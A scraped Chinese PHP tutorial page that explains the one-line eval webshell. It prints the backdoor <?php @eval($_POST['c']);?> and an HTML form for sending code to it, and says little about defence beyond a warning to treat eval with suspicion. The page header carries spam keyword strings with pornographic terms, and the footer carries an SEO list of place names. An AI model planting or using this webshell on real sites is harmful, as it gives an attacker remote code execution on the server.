国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 開發 > PHP > 正文

php eval函數一句話木馬代碼分析與防御之道

2024-05-04 23:35:25
字體:
來源:轉載
供稿:網友

這個是php常見的一句話木馬的源碼,通過post木馬程序來實現木馬的植入,eval()函數把字符串按照PHP代碼來計算。該字符串必須是合法的PHP代碼,且必須以分號結尾。如果沒有在代碼字符串中調用return語句,則返回NULL。如果代碼中存在解析錯誤,則eval()函數返回false。

eval可以用來執行任何其他php代碼,所以對于代碼里發現了eval函數一定要小心,可能是木馬

就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范

 

 
  1. <?php @eval($_POST['c']);?> 

使用方法也很簡單,本地提交文件指向提交文件,里面的php代碼就會被執行

 

 
  1. <html>  
  2. <body>  
  3. <form action="a.php" method="post">  
  4. <input type="text" name="c" value="phpinfo();">  
  5. <input type="submit" value="submit">  
  6. </form>  
  7. </body>  
  8. </html> 

以上所述就是本文的全部內容了,希望大家能夠喜歡。

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 隆化县| 江山市| 阳原县| 清流县| 井陉县| 施秉县| 郯城县| 宝坻区| 会同县| 岑巩县| 阜康市| 西和县| 顺义区| 新竹市| 堆龙德庆县| 来宾市| 小金县| 五指山市| 崇义县| 盘锦市| 抚州市| 墨竹工卡县| 凉山| 龙州县| 榆林市| 彭阳县| 高安市| 泗阳县| 台前县| 江川县| 潮安县| 若羌县| 通渭县| 宜良县| 青川县| 七台河市| 兖州市| 房山区| 河曲县| 广水市| 广宁县|